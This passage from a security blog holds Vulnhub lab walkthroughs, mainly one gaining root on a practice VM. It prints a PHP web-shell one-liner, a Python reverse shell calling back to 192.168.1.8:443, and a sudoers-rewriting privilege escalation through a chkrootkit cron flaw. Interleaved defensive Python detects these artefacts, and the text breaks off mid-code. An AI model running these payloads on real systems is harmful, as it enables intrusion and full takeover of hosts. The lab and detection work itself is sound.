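    '192.168.1.8 - - [16/Feb/2017:14:31:00 +0000] "PUT /notes.txt HTTP/1.1" 201 0 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [16/Feb/2017:14:32:00 +0000] "PUT /x.php HTTP/1.1" 403 199 "-" "curl/7.50"',
]

if __name__ == "__main__":
    uploads = find_put_uploads(SAMPLE_LOG)
    for u in uploads:
        print(f"{u['time']} {u['client']} {u['method']} {u['path']} -> {u['status']}")
    for use in find_webshell_use(SAMPLE_LOG, {u["path"] for u in uploads}):
        print(f"{use['client']} invoked {use['path']}?{use['query']}")
```

The rejected PUT (403) and the PUT of a plain text file are deliberately left out of the first result, and only requests to a path that was actually written show up in the second.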
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Check to see if it's there:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeh25cNMhXEarz35XzT8aUtZJr_lhaYbbpC3RO4oHsYfaUOwILssTpGmuBpsUJ_r-rNTMJt9EIe5KgmKYDmU-TYZ_StrwSQ1y0yF47RtRIUjhXsK836wDkXLmlDDIF5gf7Yd5eTMm62nw/s1600/1-5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeh25cNMhXEarz35XzT8aUtZJr_lhaYbbpC3RO4oHsYfaUOwILssTpGmuBpsUJ_r-rNTMJt9EIe5KgmKYDmU-TYZ_StrwSQ1y0yF47RtRIUjhXsK836wDkXLmlDDIF5gf7Yd5eTMm62nw/s400/1-5.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Awesome! I set my netcat listener on port 443 then click the file.</span><br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE77HiF6AB39YUrsDfKXKt42ZAbWvPjsmq4RUmkUySn6j_z3ymmoMGSFT77Lc_He3k3jTyCxka5Ov8Vn_9fQ33QySbAfj9gOm2zBTgNfiq0XRuKjgvH8dqcAQzKU810icEIZm-xygnyIM/s1600/1-6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE77HiF6AB39YUrsDfKXKt42ZAbWvPjsmq4RUmkUySn6j_z3ymmoMGSFT77Lc_He3k3jTyCxka5Ov8Vn_9fQ33QySbAfj9gOm2zBTgNfiq0XRuKjgvH8dqcAQzKU810icEIZm-xygnyIM/s400/1-6.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Agh!!!</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">That failed miserably :(</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Ok, I wonder if I can get a dirty shell on it? I use the one-liner:</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><?php echo shell_exec($_GET['cmd']); ?></span></span><br />
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW_YRpTJrTbRCSIOVtuFLXF7ulbNi8a4413OP-zVCwZPhqwwjz92_4Sk6nhFZXJd19hU2Fk3i8FMvd2ybeK3zZLj9FvsQv5CD-TuSry1DC5MpPCfS8QRljXPjNSzUUk6JrJCh3dx6tmt4/s1600/1-7.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW_YRpTJrTbRCSIOVtuFLXF7ulbNi8a4413OP-zVCwZPhqwwjz92_4Sk6nhFZXJd19hU2Fk3i8FMvd2ybeK3zZLj9FvsQv5CD-TuSry1DC5MpPCfS8QRljXPjNSzUUk6JrJCh3dx6tmt4/s400/1-7.png" width="400" /></a></div>
<div style="text-align: left;">
Run the command via the browser:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7-EUWkPxeGUlxSWDiHDgqiMAeuyt9OU1yv-xvhTqvX9XNHfmQusvDyqpvlHrTfecBiABhJoiiYkvNtT0GzGtbekTQfCqUXtaDu4U3eJO44KCyLEX85phuvrFyz7GZgwExHxWwblr-a2I/s1600/1-8.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7-EUWkPxeGUlxSWDiHDgqiMAeuyt9OU1yv-xvhTqvX9XNHfmQusvDyqpvlHrTfecBiABhJoiiYkvNtT0GzGtbekTQfCqUXtaDu4U3eJO44KCyLEX85phuvrFyz7GZgwExHxWwblr-a2I/s640/1-8.png" width="640" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span>
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Sweet!! Now I can try and throw a python listener my way. I use 443 as it's a web port so less likely to be blocked:</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.8",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span></span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">And the result is:</span></div>
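From the responder's side, the PHP one-liner and the Python reverse shell above are the two artefacts worth hunting for on the box: a script in the web root that feeds a request parameter into shell_exec, and a python process whose command line connects out, dup2()s the socket over stdin/stdout/stderr and launches /bin/sh. The Python below is an added example (not the author's code or any project's) that flags both from constructed file contents and ps-style lines and extracts the callback host and port; the file names, PIDs and process list are assumptions, while the web shell and the 192.168.1.8:443 callback are the ones shown on this page.

```python
"""Post-compromise triage for the two artefacts left behind by the shell
steps above: a PHP web shell in the web root and a Python reverse-shell
process. File contents, PIDs and process lines are constructed samples;
the web shell and the 192.168.1.8:443 callback are the ones on this page."""
import re
from typing import Dict, List, Optional, Tuple

# A request parameter passed straight into a command-execution function.
# Plain-text signature only: obfuscated shells (variable function names,
# base64 bodies) need a different detector, so treat a miss as "not proven".
WEBSHELL_RE = re.compile(
    r"\b(?:shell_exec|system|exec|passthru|popen|proc_open)\s*\(\s*"
    r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\)",
    re.IGNORECASE,
)

# Ingredients of the one-liner above: connect() to a host:port literal,
# dup2() of the socket over the standard descriptors, and a shell binary.
CONNECT_RE = re.compile(r"\.connect\(\s*\(\s*[\"']([^\"']+)[\"']\s*,\s*(\d{1,5})\s*\)")
DUP2_RE = re.compile(r"\bdup2\s*\(")
SHELL_RE = re.compile(r"/bin/(?:ba|da|z)?sh\b")


def scan_php_for_webshell(src: str) -> List[str]:
    """Return each offending call found in one PHP source string."""
    return [m.group(0) for m in WEBSHELL_RE.finditer(src)]


def find_reverse_shell(cmdline: str) -> Optional[Tuple[str, int]]:
    """(callback_host, callback_port) if the command line is a socket
    reverse shell, else None. All three ingredients must be present."""
    m = CONNECT_RE.search(cmdline)
    if m is None or not DUP2_RE.search(cmdline) or not SHELL_RE.search(cmdline):
        return None
    return m.group(1), int(m.group(2))


def triage_process_list(ps_lines: List[str]) -> List[Dict[str, object]]:
    """ps-style 'PID USER COMMAND' lines -> reverse shells with their callback
    endpoint, which is what a responder blocks at the egress and hunts for."""
    hits = []
    for line in ps_lines:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue  # header or truncated line
        pid, user, cmd = parts
        callback = find_reverse_shell(cmd)
        if callback is not None:
            hits.append({"pid": int(pid), "user": user, "callback": callback})
    return hits


SAMPLE_PHP = {  # constructed web root contents
    "cmd.php": "<?php echo shell_exec($_GET['cmd']); ?>",
    "index.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
}

SAMPLE_PS = [  # constructed process list; the -c body is the one-liner above
    "1234 www-data /usr/sbin/apache2 -k start",
    "1301 www-data python -c import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    's.connect(("192.168.1.8",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); '
    'os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);',
    "1302 www-data /bin/sh -i",
]

if __name__ == "__main__":
    for name, src in SAMPLE_PHP.items():
        for call in scan_php_for_webshell(src):
            print(f"web shell in {name}: {call}")
    for hit in triage_process_list(SAMPLE_PS):
        host, port = hit["callback"]
        print(f"pid {hit['pid']} ({hit['user']}) reverse shell to {host}:{port}")
```

Note that the interactive /bin/sh child (pid 1302) is not flagged on its own; its parent python process is, and the parent's callback endpoint is the indicator to carry into firewall and proxy logs.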
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn0wGoa901PZJowLzp_u1aEdQk9cldNetoytaHgDT72J4j7mDiBQ-H6GEQYqEEsBgviBOe25Mgc6BlR57zPxprJucY4_46N-YA5Vyu3TlwWtTme573AgZgzx_fNoDPprlvlHDrXifjWYU/s1600/1-9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn0wGoa901PZJowLzp_u1aEdQk9cldNetoytaHgDT72J4j7mDiBQ-H6GEQYqEEsBgviBOe25Mgc6BlR57zPxprJucY4_46N-YA5Vyu3TlwWtTme573AgZgzx_fNoDPprlvlHDrXifjWYU/s400/1-9.png" width="400" /></a></div>
<div style="text-align: left;">
<br />
Hurrah!!!</div>
<div style="text-align: left;">
Now to start enumerating:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzKDpwOKet6dzxWtYnTy5fF7GEJyVb3U-CHPR4-4wfpOKZu0jFh4ix7by7pXGdGHdvfNgwzBn9LaIoqaS5xVfIaB57MT-ugDWO7-b45C_5RJkXUTg87jcNHh-UL2XZVYhp0lQV_Y4jEcw/s1600/1-10.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzKDpwOKet6dzxWtYnTy5fF7GEJyVb3U-CHPR4-4wfpOKZu0jFh4ix7by7pXGdGHdvfNgwzBn9LaIoqaS5xVfIaB57MT-ugDWO7-b45C_5RJkXUTg87jcNHh-UL2XZVYhp0lQV_Y4jEcw/s400/1-10.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Ok, happy with the release details. Now to see if I can write anywhere:</span><br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">I can write to /tmp, but when I upload my enumeration script it doesn't allow me to execute it :(</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans", sans-serif; font-size: 13px;">I start to enumerate manually and eventually find some things in the crontab:</span><br />
<span style="font-family: "open sans", sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcd8b5hoLktng7IJqGiYkzT_0-G9XT98nSzxyh9oj120JSA35_9oH5WJmokRZFqX3e_Zm-9tHFCXntNKQIlEGL46gLfx05k8EtRxjadDKlglG1aAYMNeurRzGkoM91PC-JGJiUnrR7-V0/s1600/1-11.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcd8b5hoLktng7IJqGiYkzT_0-G9XT98nSzxyh9oj120JSA35_9oH5WJmokRZFqX3e_Zm-9tHFCXntNKQIlEGL46gLfx05k8EtRxjadDKlglG1aAYMNeurRzGkoM91PC-JGJiUnrR7-V0/s400/1-11.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans", sans-serif; font-size: 13px;"><br /></span>
<span style="font-family: "open sans", sans-serif; font-size: 13px;">I'll check out the daily one:</span><br />
<span style="font-family: "open sans", sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA-1SPmQIM9eXkiHwFQ40U9Ae2eufpGSzkC721TuT_oWSQgR-ipgeOrS1Wgsqqv_J9H1DBNoxPSoThcbatJouLpjGRwQmMSQ4eJwBlRWpPTbb7-bJ7kftElYhKm_LbzsitOM-_D4NwcpI/s1600/1-12.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA-1SPmQIM9eXkiHwFQ40U9Ae2eufpGSzkC721TuT_oWSQgR-ipgeOrS1Wgsqqv_J9H1DBNoxPSoThcbatJouLpjGRwQmMSQ4eJwBlRWpPTbb7-bJ7kftElYhKm_LbzsitOM-_D4NwcpI/s400/1-12.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans", sans-serif; font-size: 13px;"><br /></span>
<span style="font-family: "open sans", sans-serif; font-size: 13px;">Ok, some stuff in here; time to start looking at their code.</span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">After sifting through the code nothing jumps out at me, so I revert to Google to see if the file "chkrootkit" has any flaws.</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Exploit-DB comes up trumps with this: </span><a href="https://www.exploit-db.com/exploits/33899/" style="font-family: "Open Sans", sans-serif; font-size: 13px;">https://www.exploit-db.com/exploits/33899/</a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKJZ88Z6ZRCDcPhLYNtCpBXbaZVEaOPFsIUPpB5xoZ1ivupFM4l7lOM8YJVIOLmMNhj3YQcJS4e12sqCMb9OhQ3G32j8GIhg_-iFDjscTuGO_c0_sd0qVDeAIBBw1gaVHH_oGZmdkAAp0/s1600/1-13.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKJZ88Z6ZRCDcPhLYNtCpBXbaZVEaOPFsIUPpB5xoZ1ivupFM4l7lOM8YJVIOLmMNhj3YQcJS4e12sqCMb9OhQ3G32j8GIhg_-iFDjscTuGO_c0_sd0qVDeAIBBw1gaVHH_oGZmdkAAp0/s640/1-13.png" width="640" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Awesome!! Now to create that /tmp/update file and leverage me some privileges!!</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Inside the file I put:</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;">chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers</span></span><br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">This should give my www-data account sudo rights without a password :)</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">The cronjob runs and:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrLhExfUAdUZIQB5vEG_jp7_MiFe0QIP_RYXUKk1qo5tt8Oa4XWef3Om0HShSZKoACBthHIp-cDGrUXv91XgX5_Q9AHkG8f5wjthnYuiD9oXkNJE9FQroihRbEobREFo8kiCpqWQMOfYM/s1600/1-14.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="75" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrLhExfUAdUZIQB5vEG_jp7_MiFe0QIP_RYXUKk1qo5tt8Oa4XWef3Om0HShSZKoACBthHIp-cDGrUXv91XgX5_Q9AHkG8f5wjthnYuiD9oXkNJE9FQroihRbEobREFo8kiCpqWQMOfYM/s400/1-14.png" width="400" /></a></div>
<div style="text-align: left;">
<br />
I am root :) </div>
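Seen from the host owner's side, the escalation above rests on two things a routine audit catches: a /tmp/update file that the root cron job running chkrootkit will execute, and a sudoers rule handing www-data passwordless sudo (the chmod 777 is reverted, so the file mode alone won't tell you afterwards; the content will). The Python below is an added example (not the author's, chkrootkit's or sudo's code) that audits constructed sudoers content, checks a sudoers file's mode and owner, and looks for the update stub in a directory standing in for /tmp; the SERVICE_ACCOUNTS list and the sample rules are assumptions.

```python
"""Host audit for the escalation path above: a root cron job (chkrootkit)
that executes /tmp/update if it exists, and a sudoers rule giving the web
server account passwordless sudo. Sample sudoers content is constructed;
the /tmp path is a parameter so the demo runs against a temp directory."""
import os
import re
import stat
import tempfile
from typing import Dict, List

# Accounts that should hold no sudo rule at all (assumed list; extend per host).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody", "mysql", "postgres"}

# user  host=(runas) TAG: ... commands   (runas and tags are optional)
SUDOERS_RULE_RE = re.compile(
    r"^(?P<user>[%+]?[\w.-]+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\([^)]*\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)$"
)


def audit_sudoers(text: str) -> List[Dict[str, object]]:
    """One finding per risky rule: any rule for a service account, or
    NOPASSWD on ALL commands for anyone. Scoped NOPASSWD rules are allowed."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults") or line.split()[0].endswith("_Alias"):
            continue
        m = SUDOERS_RULE_RE.match(line)
        if m is None:
            continue  # anything this small parser does not understand
        user, cmds = m["user"], m["cmds"].strip()
        nopasswd = "NOPASSWD:" in m["tags"]
        if user in SERVICE_ACCOUNTS:
            reason = "sudo rule for a service account" + (" (NOPASSWD)" if nopasswd else "")
            findings.append({"line": lineno, "user": user, "severity": "critical", "reason": reason})
        elif nopasswd and cmds == "ALL":
            findings.append({"line": lineno, "user": user, "severity": "high",
                             "reason": "passwordless sudo for ALL commands"})
    return findings


def audit_sudoers_file(path: str) -> List[str]:
    """sudoers must be root-owned and mode 0440; the chmod 777 window above
    is short-lived, so pair this with audit_sudoers() on the content."""
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    problems = []
    if mode != 0o440:
        problems.append(f"mode is {mode:04o}, expected 0440")
    if st.st_uid != 0:
        problems.append(f"owner uid is {st.st_uid}, expected 0")
    if mode & stat.S_IWOTH:
        problems.append("world-writable: any local user can grant themselves sudo")
    return problems


def check_chkrootkit_update_stub(tmp_dir: str = "/tmp") -> Dict[str, object]:
    """The chkrootkit flaw used above runs <tmp_dir>/update as root from cron,
    so on a clean host that path must not exist; report it if it does."""
    path = os.path.join(tmp_dir, "update")
    if not os.path.lexists(path):
        return {"path": path, "present": False}
    st = os.lstat(path)
    return {"path": path, "present": True, "owner_uid": st.st_uid,
            "executable": bool(st.st_mode & stat.S_IXUSR),
            "is_symlink": stat.S_ISLNK(st.st_mode)}


SAMPLE_SUDOERS = """\
# constructed sample, not copied from any host
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
backup  ALL=NOPASSWD: /usr/bin/rsync
deploy  ALL=(ALL) NOPASSWD: ALL
www-data ALL=NOPASSWD: ALL
"""


def demo() -> Dict[str, object]:
    """Run every check against constructed data in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        sudoers_path = os.path.join(tmp, "sudoers")
        with open(sudoers_path, "w") as fh:
            fh.write(SAMPLE_SUDOERS)
        os.chmod(sudoers_path, 0o644)  # deliberately too open for the demo
        before = check_chkrootkit_update_stub(tmp)
        stub = os.path.join(tmp, "update")
        with open(stub, "w") as fh:
            fh.write("# constructed placeholder, does nothing\n")
        os.chmod(stub, 0o755)
        return {"rules": audit_sudoers(SAMPLE_SUDOERS),
                "file": audit_sudoers_file(sudoers_path),
                "before": before, "after": check_chkrootkit_update_stub(tmp)}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The backup account's rule is deliberately not flagged: NOPASSWD scoped to one binary is a normal pattern, whereas NOPASSWD on ALL, and any rule at all for the web server's account, is what the walkthrough above plants.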
<div style="text-align: left;">
<br />
Let's see what is lurking within:</div>
<div style="text-align: left;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7X_dXmUk7DgwY0dxi2uYFpRLFdoXIqpdaxFwWZT5r06NoBLzst2Ok28jqBHiRtqS9LZydbUYhF6Km3nWRHIMDK9o_K8kllBBjQOgSb8Tj2CAfv0aiIEqDlQO5Mz75N-vF-qoKtFoRoQc/s1600/1-15.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7X_dXmUk7DgwY0dxi2uYFpRLFdoXIqpdaxFwWZT5r06NoBLzst2Ok28jqBHiRtqS9LZydbUYhF6Km3nWRHIMDK9o_K8kllBBjQOgSb8Tj2CAfv0aiIEqDlQO5Mz75N-vF-qoKtFoRoQc/s640/1-15.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i2.kym-cdn.com/photos/images/newsfeed/000/817/310/09c.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i2.kym-cdn.com/photos/images/newsfeed/000/817/310/09c.gif" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Phew!! This made me stretch the old grey matter!!!!</div>
<br /></div>
</div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-44141422427846247982016-10-08T12:21:00.001+01:002017-02-08T14:19:38.017+00:00Vulnhub Tr0ll<div dir="ltr" style="text-align: left;" trbidi="on">
This is another boot2root brought to you by Vulnhub. Big thanks go out to <a href="https://twitter.com/@maleus21">maleus21</a> for creating this. I had fun with this vm and boy did it piss me off at times lol. I remembered to step back and think a bit more with this vm too (let's be honest most of the time it's dive in and "must get roooooootttttt!!!!")<br />
<br />
I am going to stop using cherry tree after this, as I am not happy about the quality it exports at.<br />
<br />
So here it is!!<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOaHNmN2dtS1M4X0U/preview" width="640"></iframe><br />
<br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com1tag:blogger.com,1999:blog-4115963120017667746.post-78568667541708996262016-10-04T23:17:00.003+01:002017-02-08T14:19:38.028+00:00Vulnhub SickOS1.1<div dir="ltr" style="text-align: left;" trbidi="on">
Vulnhub has kept me amused today as I had some free time. As this VM is based on an OSCP machine I thought I would see how I fared. Thanks again to vulnhub and <a href="https://twitter.com/@D4rk36">@D4rk36</a> for making it.<br />
<br />
So here it is:<br />
<br />
<a href="https://www.vulnhub.com/entry/sickos-11,132/">https://www.vulnhub.com/entry/sickos-11,132/</a><br />
<br />
And here's my bit, enjoy!!<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOWVhjb18xbk5nVWc/preview" width="640"></iframe><br />
<br />
<br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-5395455380362680732016-10-04T16:29:00.003+01:002017-02-08T14:19:38.022+00:00Vulnhub Mr-Robot 1<div dir="ltr" style="text-align: left;" trbidi="on">
First of all thanks to Jason for making this VM and for Vulnhub who host it.<br />
<br />
The URL of this is <a href="https://www.vulnhub.com/entry/mr-robot-1,151/">https://www.vulnhub.com/entry/mr-robot-1,151/</a><br />
<br />
I really enjoyed this VM as it approached things a little differently from others in how you grab root. I did have some "fun" with latency in my VMware setup, and I also got some weird double echoes. But I managed to sort it in the very technical way of rebooting.<br />
<br />
Anyway enough of me!!<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOYVBnUlRVUUZzSTg/preview" width="640"></iframe><br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-1743078159157860292016-09-16T15:19:00.001+01:002017-02-08T14:19:38.011+00:00Pentestit Lab v9 Writeup<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
My first epic write-up!! There are some mistakes, as time is something I lack :(<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOTUxUY0J3eXMxVkk/preview" width="640"></iframe><br />
<br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com1tag:blogger.com,1999:blog-4115963120017667746.post-15429245471310847522016-09-16T09:31:00.001+01:002017-02-08T14:19:38.009+00:00Vulnhub Stapler<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
Good old Vulnhub. It is home to a commendable collection of virtual machines for folk to go and flex their hacky fingers on. I quite enjoy doing them, as a challenge is a challenge! Also, by writing about them I get to stuff that knowledge further into my brain (that's how mine works), and it gives me practice at report writing.<br />
<br />
I really enjoyed this VM as there are several ways to exploit it. I did two of them and have left the rest for a time further down the road when the exploits aren't as fresh in my head.<br />
<br />
<br />
I use CherryTree for my note-taking, but unfortunately the exported PDF has made the images look odd; this seems to be a quirk of its export.<br />
<br />
So here's how I found the flags<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOdGttUjVjbnY5cFk/preview" width="640"></iframe><br />
<br />
<br />
After scanning the ports it was time to start finding a way inside. Port 21 (FTP) was first on the scan, so it was first on my hit list.<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOM2JWVjZ2bC1VNUE/preview" width="640"></iframe><br />
<br />
<br />
After getting nowhere with this port I moved on to the SSH port.<br />
<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOd2NYU1dBdDRFS0k/preview" width="640"></iframe><br />
<br />
<br />
This is my enumeration of users:<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOaXZfZ1Q0Vi1lX0U/preview" width="640"></iframe><br />
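The recon steps the write-up walks through (port scan, then a look at what FTP on 21 and then SSH are advertising) are shown in the embedded PDFs. The script below is an added example of that first step, not the author's code and not anything taken from the Stapler VM: a TCP connect scan with banner grabbing. To keep it runnable offline it spins up fake local services whose banners (the vsFTPd and OpenSSH strings) are constructed for the demo, and it also shows the two cases a beginner's scanner often gets wrong: a port that is open but silent (the service expects the client to speak first) and a port that is closed. Against a real target you would pass the host and the ports your nmap scan reported.

```python
#!/usr/bin/env python3
"""TCP connect scan plus banner grab (added example, not from the original post).

Everything here runs against 127.0.0.1: the "services" are threads that
greet each client with a constructed banner. Nothing is taken from Stapler.
"""
import socket
import threading
from typing import Dict, List, Optional, Tuple

# Constructed banners for the demo (assumption: typical FTP/SSH greetings,
# NOT the strings the real Stapler VM sends).
FAKE_FTP_BANNER = b"220 (vsFTPd 3.0.3)\r\n"
FAKE_SSH_BANNER = b"SSH-2.0-OpenSSH_7.2p2 Ubuntu\r\n"


def start_fake_service(banner: bytes) -> int:
    """Listen on an ephemeral loopback port and greet every client with banner.

    An empty banner models a service (e.g. HTTP) that waits for the client
    to talk first, so the scanner sees an open but silent port.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    port = listener.getsockname()[1]

    def loop() -> None:
        while True:
            client, _ = listener.accept()
            try:
                if banner:
                    client.sendall(banner)
            finally:
                client.close()

    threading.Thread(target=loop, daemon=True).start()
    return port


def closed_port() -> int:
    """Reserve an ephemeral port, then release it so nothing is listening there."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def grab_banner(host: str, port: int, timeout: float = 1.0) -> Optional[bytes]:
    """Connect and return whatever the service volunteers.

    None  -> connection failed (closed/filtered)
    b""   -> open, but the service said nothing before timeout/EOF
    bytes -> the greeting the service sent unprompted
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                return s.recv(256)
            except socket.timeout:
                return b""
    except OSError:  # ConnectionRefusedError, timeouts, unreachable hosts
        return None


def classify(banner: Optional[bytes]) -> str:
    """Cheap protocol guess from the greeting alone (no probes sent)."""
    if banner is None:
        return "closed"
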